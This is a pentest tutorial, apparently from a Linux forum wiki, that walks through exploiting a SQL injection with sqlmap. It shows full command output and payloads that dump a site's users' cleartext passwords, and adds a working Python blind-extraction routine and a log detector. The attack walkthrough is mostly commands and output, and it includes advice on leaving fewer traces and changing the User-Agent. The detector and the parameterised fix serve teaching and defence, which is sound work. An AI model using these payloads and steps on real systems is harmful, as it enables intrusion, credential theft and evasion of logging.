== Presentation ==
Here is an example of SQL injection exploitation with the sqlmap tool.
sqlmap is installed by default on BackTrack 5 R1, but I am including the installation steps in case you want to try it on another Linux distribution or update it.
Note from Inazo: a big drawback of these tools is the amount of traces generated by the test requests; even if the attack can be simple with sqlmap, it is better to do it by hand.
== Installation ==
It is very simple: since it is written in Python there is nothing to compile.
http://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-0.9.tar.gz/d…
We extract the archive and move the extracted directory to the place where BackTrack keeps it (adjust the source name if your archive extracts to a differently named directory).
tar -xzvf sqlmap-0.9.tar.gz
mv sqlmap-0.9 /pentest/database/sqlmap/
== Usage ==
We go to the sqlmap directory:
cd /pentest/database/sqlmap/
And we launch the attack on the site being pentested (the URL is quoted so the shell does not interpret ? and &):
python sqlmap.py -u "http://www.sitetest.com/product.php?id=54" --dbs
We wait; once sqlmap has found an injectable parameter it asks "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]", and we answer n.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:19:54
[11:19:54] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:19:54] [INFO] testing connection to the target url
[11:19:56] [INFO] testing if the url is stable, wait a few seconds
[11:19:57] [INFO] url is stable
[11:19:57] [INFO] testing if GET parameter 'id' is dynamic
[11:19:58] [INFO] confirming that GET parameter 'id' is dynamic
[11:19:59] [INFO] GET parameter 'id' is dynamic
[11:19:59] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[11:19:59] [INFO] testing sql injection on GET parameter 'id'
[11:19:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:20:02] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:20:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:20:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[11:20:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:20:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:21:09] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:21:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:21:39] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:10] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:41] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:23:03] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:23:03] [INFO] fetching database names
[11:23:04] [INFO] the SQL query used returns 5 entries
[11:23:04] [INFO] retrieved: information_schema
[11:23:04] [INFO] retrieved: www_choserentals_com
[11:23:05] [INFO] retrieved: www_chose_com
[11:23:05] [INFO] retrieved: www_chose_com_working
[11:23:06] [INFO] retrieved: www_sitetest_com
available databases [5]:
[*] information_schema
[*] www_choserentals_com
[*] www_chose_com
[*] www_chose_com_working
[*] www_sitetest_com
[11:23:06] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:23:06
Let's look at the tables.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com --tables
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:26:59
[11:26:59] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:26:59] [INFO] resuming injection data from session file
[11:26:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:26:59] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:27:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:27:00] [INFO] fetching tables for database 'www_sitetest_com'
[11:27:01] [INFO] the SQL query used returns 62 entries
[11:27:01] [INFO] retrieved: www_sitetest_com
[11:27:02] [INFO] retrieved: AssemblyInstructions
[11:27:02] [INFO] retrieved: www_sitetest_com
[11:27:03] [INFO] retrieved: BrandedList
[11:27:03] [INFO] retrieved: www_sitetest_com
[11:27:04] [INFO] retrieved: BrandedMapProducts
[11:27:04] [INFO] retrieved: www_sitetest_com
[11:27:05] [INFO] retrieved: CampaignHits
[11:27:05] [INFO] retrieved: www_sitetest_com
[11:27:06] [INFO] retrieved: CatMapProducts
[11:27:06] [INFO] retrieved: www_sitetest_com
[11:27:07] [INFO] retrieved: CatalogList
[11:27:07] [INFO] retrieved: www_sitetest_com
[11:27:08] [INFO] retrieved: Category
[11:27:08] [INFO] retrieved: www_sitetest_com
[11:27:09] [INFO] retrieved: CheckersMetrics
[11:27:09] [INFO] retrieved: www_sitetest_com
[11:27:10] [INFO] retrieved: Customers
[11:27:10] [INFO] retrieved: www_sitetest_com
[11:27:11] [INFO] retrieved: EJCustomers
[11:27:11] [INFO] retrieved: www_sitetest_com
[11:27:12] [INFO] retrieved: EJOrderItems
[11:27:12] [INFO] retrieved: www_sitetest_com
[11:27:13] [INFO] retrieved: EJOrders
[11:27:13] [INFO] retrieved: www_sitetest_com
[11:27:14] [INFO] retrieved: Email
[11:27:14] [INFO] retrieved: www_sitetest_com
[11:27:15] [INFO] retrieved: EmailList
[11:27:15] [INFO] retrieved: www_sitetest_com
[11:27:16] [INFO] retrieved: HomePagePics
[11:27:16] [INFO] retrieved: www_sitetest_com
[11:27:17] [INFO] retrieved: HomePageProducts
[11:27:17] [INFO] retrieved: www_sitetest_com
[11:27:18] [INFO] retrieved: HomePages
[11:27:18] [INFO] retrieved: www_sitetest_com
[11:27:19] [INFO] retrieved: LPBrandedList
[11:27:19] [INFO] retrieved: www_sitetest_com
[11:27:20] [INFO] retrieved: LPHomePages
[11:27:20] [INFO] retrieved: www_sitetest_com
[11:27:21] [INFO] retrieved: LPMetrics
[11:27:22] [INFO] retrieved: www_sitetest_com
[11:27:22] [INFO] retrieved: Model
[11:27:23] [INFO] retrieved: www_sitetest_com
[11:27:23] [INFO] retrieved: PageMetaData
[11:27:24] [INFO] retrieved: www_sitetest_com
[11:27:24] [INFO] retrieved: PhotoGallery
[11:27:25] [INFO] retrieved: www_sitetest_com
[11:27:25] [INFO] retrieved: PriceBook
[11:27:26] [INFO] retrieved: www_sitetest_com
[11:27:26] [INFO] retrieved: PriceBookLogos
[11:27:27] [INFO] retrieved: www_sitetest_com
[11:27:27] [INFO] retrieved: PriceBookMasterPriceList
[11:27:28] [INFO] retrieved: www_sitetest_com
[11:27:28] [INFO] retrieved: PriceBookPasswordRequest
[11:27:29] [INFO] retrieved: www_sitetest_com
[11:27:29] [INFO] retrieved: PriceBookProductGroups
[11:27:30] [INFO] retrieved: www_sitetest_com
[11:27:30] [INFO] retrieved: PriceBookReports
[11:27:31] [INFO] retrieved: www_sitetest_com
[11:27:31] [INFO] retrieved: PriceBookSpecialPriceList
[11:27:32] [INFO] retrieved: www_sitetest_com
[11:27:32] [INFO] retrieved: PriceBookUserMetrics
[11:27:33] [INFO] retrieved: www_sitetest_com
[11:27:33] [INFO] retrieved: PriceBookUsers
[11:27:34] [INFO] retrieved: www_sitetest_com
[11:27:34] [INFO] retrieved: ProductAccessoryPictures
[11:27:35] [INFO] retrieved: www_sitetest_com
[11:27:35] [INFO] retrieved: ProductFeatures
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:36] [INFO] retrieved: ProductLoadCapacity
[11:27:36] [INFO] retrieved: www_sitetest_com
[11:27:37] [INFO] retrieved: ProductNewFeatures
[11:27:37] [INFO] retrieved: www_sitetest_com
[11:27:38] [INFO] retrieved: ProductNotes
[11:27:38] [INFO] retrieved: www_sitetest_com
[11:27:39] [INFO] retrieved: ProductPicturesByBrand
[11:27:39] [INFO] retrieved: www_sitetest_com
[11:27:40] [INFO] retrieved: ProductPicturesByCategory
[11:27:40] [INFO] retrieved: www_sitetest_com
[11:27:41] [INFO] retrieved: ProductRelatedModels
[11:27:41] [INFO] retrieved: www_sitetest_com
[11:27:42] [INFO] retrieved: ProductSpecifications
[11:27:42] [INFO] retrieved: www_sitetest_com
[11:27:43] [INFO] retrieved: ProductSymbols
[11:27:43] [INFO] retrieved: www_sitetest_com
[11:27:44] [INFO] retrieved: ProductWarnings
[11:27:44] [INFO] retrieved: www_sitetest_com
[11:27:45] [INFO] retrieved: Products
[11:27:45] [INFO] retrieved: www_sitetest_com
[11:27:46] [INFO] retrieved: ProductsMapModels
[11:27:46] [INFO] retrieved: www_sitetest_com
[11:27:47] [INFO] retrieved: RelatedLinks
[11:27:47] [INFO] retrieved: www_sitetest_com
[11:27:48] [INFO] retrieved: RentalCustomers
[11:27:48] [INFO] retrieved: www_sitetest_com
[11:27:49] [INFO] retrieved: RentalOrderDetails
[11:27:50] [INFO] retrieved: www_sitetest_com
[11:27:50] [INFO] retrieved: RentalOrders
[11:27:51] [INFO] retrieved: www_sitetest_com
[11:27:51] [INFO] retrieved: RentalUsers
[11:27:52] [INFO] retrieved: www_sitetest_com
[11:27:52] [INFO] retrieved: SiteParameters
[11:27:53] [INFO] retrieved: www_sitetest_com
[11:27:53] [INFO] retrieved: Transpage
[11:27:54] [INFO] retrieved: www_sitetest_com
[11:27:55] [INFO] retrieved: Users
[11:27:55] [INFO] retrieved: www_sitetest_com
[11:27:56] [INFO] retrieved: WebHeaders
[11:27:56] [INFO] retrieved: www_sitetest_com
[11:27:57] [INFO] retrieved: WebsiteBrands
[11:27:57] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteCategory
[11:27:58] [INFO] retrieved: www_sitetest_com
[11:27:58] [INFO] retrieved: WebsiteContactInfo
[11:27:59] [INFO] retrieved: www_sitetest_com
[11:27:59] [INFO] retrieved: WebsiteModels
[11:28:00] [INFO] retrieved: www_sitetest_com
[11:28:00] [INFO] retrieved: WebsiteProducts
[11:28:01] [INFO] retrieved: www_sitetest_com
[11:28:01] [INFO] retrieved: Websites
[11:28:02] [INFO] retrieved: www_sitetest_com
[11:28:02] [INFO] retrieved: orderItems
[11:28:03] [INFO] retrieved: www_sitetest_com
[11:28:03] [INFO] retrieved: orders
Database: www_sitetest_com
[62 tables]
+---------------------------+
| AssemblyInstructions |
| BrandedList |
| BrandedMapProducts |
| CampaignHits |
| CatMapProducts |
| CatalogList |
| Category |
| CheckersMetrics |
| Customers |
| EJCustomers |
| EJOrderItems |
| EJOrders |
| Email |
| EmailList |
| HomePagePics |
| HomePageProducts |
| HomePages |
| LPBrandedList |
| LPHomePages |
| LPMetrics |
| Model |
| PageMetaData |
| PhotoGallery |
| PriceBook |
| PriceBookLogos |
| PriceBookMasterPriceList |
| PriceBookPasswordRequest |
| PriceBookProductGroups |
| PriceBookReports |
| PriceBookSpecialPriceList |
| PriceBookUserMetrics |
| PriceBookUsers |
| ProductAccessoryPictures |
| ProductFeatures |
| ProductLoadCapacity |
| ProductNewFeatures |
| ProductNotes |
| ProductPicturesByBrand |
| ProductPicturesByCategory |
| ProductRelatedModels |
| ProductSpecifications |
| ProductSymbols |
| ProductWarnings |
| Products |
| ProductsMapModels |
| RelatedLinks |
| RentalCustomers |
| RentalOrderDetails |
| RentalOrders |
| RentalUsers |
| SiteParameters |
| Transpage |
| Users |
| WebHeaders |
| WebsiteBrands |
| WebsiteCategory |
| WebsiteContactInfo |
| WebsiteModels |
| WebsiteProducts |
| Websites |
| orderItems |
| orders |
+---------------------------+
[11:28:03] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:28:03
For the example we will check the columns of the Users table.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users --columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:30:38
[11:30:38] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:30:38] [INFO] resuming injection data from session file
[11:30:38] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:30:38] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:30:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:30:39] [INFO] fetching columns for table 'Users' on database 'www_sitetest_com'
[11:30:40] [INFO] the SQL query used returns 4 entries
[11:30:40] [INFO] retrieved: ID
[11:30:41] [INFO] retrieved: int(11)
[11:30:41] [INFO] retrieved: UserName
[11:30:42] [INFO] retrieved: varchar(255)
[11:30:42] [INFO] retrieved: Password
[11:30:43] [INFO] retrieved: varchar(255)
[11:30:43] [INFO] retrieved: Email
[11:30:44] [INFO] retrieved: varchar(255)
Database: www_sitetest_com
Table: Users
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| Email | varchar(255) |
| ID | int(11) |
| Password | varchar(255) |
| UserName | varchar(255) |
+----------+--------------+
[11:30:44] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:30:44
We will do a simple test on the ID column first, just to see, and to keep the suspense going.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C ID --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:32:36
[11:32:37] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:32:37] [INFO] resuming injection data from session file
[11:32:37] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:32:37] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:32:38] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:32:38] [INFO] fetching columns 'ID' entries for table 'Users' on database 'www_sitetest_com'
[11:32:38] [INFO] the SQL query used returns 3 entries
[11:32:39] [INFO] retrieved: 1
[11:32:39] [INFO] retrieved: 2
[11:32:40] [INFO] retrieved: 3
Database: www_sitetest_com
Table: Users
[3 entries]
+----+
| ID |
+----+
| 1 |
| 2 |
| 3 |
+----+
[11:32:40] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:32:40] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:32:40
We see that the user IDs are 1, 2 and 3. These numbers have a meaning, but we will not deal with that now.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C Password --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:34:50
[11:34:51] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:34:51] [INFO] resuming injection data from session file
[11:34:51] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:34:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:34:52] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:34:52] [INFO] fetching columns 'Password' entries for table 'Users' on database 'www_sitetest_com'
[11:34:52] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:34:52] [INFO] the SQL query used returns 3 entries
[11:34:53] [INFO] retrieved: grissom
[11:34:54] [INFO] retrieved: robbi
[11:34:54] [INFO] retrieved: cab!lost
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| Password |
+----------+
| grissom |
| robbi |
| cab!lost |
+----------+
[11:34:54] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:34:54] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:34:54
Here we see that the first password returned is grissom; assuming the rows come back in the same order as in the ID dump, it belongs to user 1.
On to the usernames.
$ python sqlmap.py -u http://www.sitetest.com/product.php?id=54 -D www_sitetest_com -T Users -C UserName --dump
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:40:23
[11:40:24] [INFO] using '/home/user/sqlmap/output/www.sitetest.com/session' as session file
[11:40:24] [INFO] resuming injection data from session file
[11:40:24] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:40:24] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=54 AND 5486=5486
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=54 AND (SELECT 6970 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,104,102,58),(SELECT (CASE WHEN (6970=6970) THEN 1 ELSE 0 END)),CHAR(58,112,120,102,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=54 AND SLEEP(5)
---
[11:40:25] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: PHP 5.3.3, Apache 2.2.17
back-end DBMS: MySQL 5.0
[11:40:25] [INFO] fetching columns 'UserName' entries for table 'Users' on database 'www_sitetest_com'
[11:40:25] [INFO] read from file '/home/user/sqlmap/output/www.sitetest.com/session': 3
[11:40:25] [INFO] the SQL query used returns 3 entries
[11:40:25] [INFO] retrieved: bryan
[11:40:26] [INFO] retrieved: robbi
[11:40:26] [INFO] retrieved: jesica
Database: www_sitetest_com
Table: Users
[3 entries]
+----------+
| UserName |
+----------+
| bryan |
| robbi |
| jesica |
+----------+
[11:40:26] [INFO] Table 'www_sitetest_com.Users' dumped to CSV file '/home/user/sqlmap/output/www.sitetest.com/dump/www_sitetest_com/Users.csv'
[11:40:26] [INFO] Fetched data logged to text files under '/home/user/sqlmap/output/www.sitetest.com'
[*] shutting down at: 11:40:26
And there you have it: UserName bryan, Password grissom. Two things a pentester should note here: the Password column holds cleartext values, which is a finding in itself; and dumping the three columns in three separate runs only pairs them correctly if the rows come back in the same order every time, so to be certain which password belongs to which user, dump the columns together in a single run with -C ID,UserName,Password --dump.
I should point out that I did not use sqlmap under real conditions, but on a vulnerable site installed for the test on a server dedicated to testing.
Any use of this software for purposes other than testing, on a site that does not belong to you, is punishable under the laws in force in your country.
Using proprietary software is like eating ready meals: you cannot tell what preservatives they contain, you will always be told it is good, but it will never replace a home-cooked meal made by your mum.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
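What sqlmap is doing under the hood during the run above, as an added example that is not part of the original post: a Python stand-in for product.php backed by an in-memory SQLite database (sample rows constructed here, reusing the bryan/grissom pair returned by the dumps; the product name and e-mail address are invented) that recovers a Users row with the same boolean-based blind technique the "id=54 AND 5486=5486" probe announces, next to the same lookup rewritten with a validated, bound parameter, against which the probe gets nothing. SQLite's unicode(substr(...)) stands in for MySQL's ASCII(SUBSTRING(...)).

```python
import sqlite3

# Constructed in-memory stand-in for the MySQL database behind
# product.php?id=: a products table and the Users table from the post. The
# row reuses the UserName/Password pair the dumps returned; the product name
# and e-mail address are invented.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products VALUES (54, 'pallet jack');
CREATE TABLE Users (ID INTEGER, UserName TEXT, Password TEXT, Email TEXT);
INSERT INTO Users VALUES (1, 'bryan', 'grissom', 'bryan@example.invalid');
""")

REQUESTS = {"count": 0}  # each handler call is one HTTP request in the real attack


def product_vulnerable(id_param: str):
    """product.php as the post finds it: the id parameter is pasted straight
    into the SQL string, so an appended 'AND <condition>' gets evaluated."""
    REQUESTS["count"] += 1
    row = _conn.execute("SELECT name FROM products WHERE id=" + id_param).fetchone()
    return row[0] if row else None


def product_safe(id_param: str):
    """Same lookup with the id validated and bound as a parameter: anything
    that is not an integer never reaches the database."""
    REQUESTS["count"] += 1
    try:
        pid = int(id_param)
    except ValueError:
        return None
    row = _conn.execute("SELECT name FROM products WHERE id=?", (pid,)).fetchone()
    return row[0] if row else None


def oracle(handler, condition: str) -> bool:
    """The boolean oracle behind 'id=54 AND 5486=5486': the condition is true
    iff product 54 is still returned."""
    return handler("54 AND (" + condition + ")") is not None


def blind_extract(handler, subquery: str, max_len: int = 64) -> str:
    """Recover the one-row, one-column result of `subquery` a character at a
    time. Each character is found by binary search on its code point (7
    requests instead of up to 128), which is what sqlmap's boolean-based
    blind technique does. MySQL spells the probe ASCII(SUBSTRING(...));
    SQLite uses unicode(substr(...))."""
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(handler, f"length(({subquery})) >= {pos}"):
            break  # no character at this position: the string is complete
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(handler, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


def dump_user(handler, user_id: int) -> dict:
    """Equivalent of '-T Users -C UserName,Password --dump' for one row,
    pinned to a single ID so the two columns cannot be misaligned."""
    return {
        col: blind_extract(handler, f"SELECT {col} FROM Users WHERE ID={user_id}")
        for col in ("UserName", "Password")
    }


if __name__ == "__main__":
    for handler in (product_vulnerable, product_safe):
        REQUESTS["count"] = 0
        print(handler.__name__, dump_user(handler, 1), f"({REQUESTS['count']} requests)")
```

Running it prints the recovered row and the number of requests it cost (98 for two short strings, every one of them a line in the target's access log, which is the volume of traces Inazo's note refers to); against the parameterised version the very first probe returns nothing and the extraction stops empty.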
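The trace side of Inazo's note, as an added example that is not from the post: a small Python detector run over constructed Apache combined-format access-log lines modelled on the probes sqlmap reported in the log above (URL-encoded as they reach the web server, documentation IP addresses, and the tool's default User-Agent string as assumed here). It flags a request by User-Agent and by payload shape in the decoded query string, and counts flagged requests per client.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines, not taken from the post: one
# normal visitor, then the three probe shapes sqlmap reported (boolean
# tautology, error-based subselect against information_schema, SLEEP),
# URL-encoded. IPs are documentation addresses; the sqlmap User-Agent
# string is the tool's default as assumed here.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2011:11:19:50 +0200] "GET /product.php?id=54 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Sep/2011:11:20:02 +0200] "GET /product.php?id=54%20AND%205486%3D5486 HTTP/1.1" 200 8123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
198.51.100.23 - - [12/Sep/2011:11:20:08 +0200] "GET /product.php?id=54%20AND%20%28SELECT%206970%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 421 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
198.51.100.23 - - [12/Sep/2011:11:21:09 +0200] "GET /product.php?id=54%20AND%20SLEEP%285%29 HTTP/1.1" 200 8123 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.7 - - [12/Sep/2011:11:21:15 +0200] "GET /product.php?id=55 HTTP/1.1" 200 8011 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Patterns matched against the URL-decoded query string. They mirror the
# payload families in the post's log: tautologies, subselects, enumeration
# of information_schema, time-based probes, and UNION probes.
PAYLOAD_RES = {
    "tautology": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "subselect": re.compile(r"\bSELECT\b.*\bFROM\b", re.I | re.S),
    "schema_enum": re.compile(r"information_schema", re.I),
    "time_based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
}


def score_line(line: str) -> list:
    """Return the reasons a request looks like an injection probe (an empty
    list for a clean request)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("user_agent")
    decoded = unquote_plus(m["path"].partition("?")[2])
    for name, pat in PAYLOAD_RES.items():
        if pat.search(decoded):
            reasons.append(name)
    # A 500 on a request that already carries a payload is the error-based
    # technique tripping the application.
    if reasons and m["status"] == "500":
        reasons.append("server_error_on_payload")
    return reasons


def suspicious_clients(log_text: str) -> Counter:
    """Count flagged requests per client IP; one client producing dozens of
    hits in a minute is the trace Inazo's note warns about."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and score_line(line):
            hits[m["ip"]] += 1
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(score_line(line) or "clean", "<-", line[:80])
    print(suspicious_clients(SAMPLE_LOG))
```

Changing the User-Agent (sqlmap's --user-agent or --random-agent options) removes the first signal only; the payload shapes, the request rate and the 500 responses stay in the log, which is why the note above recommends doing the injection by hand when discretion matters.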
Added to the wiki: http://linuxtrack.net/wiki/doku.php?id=sqlmap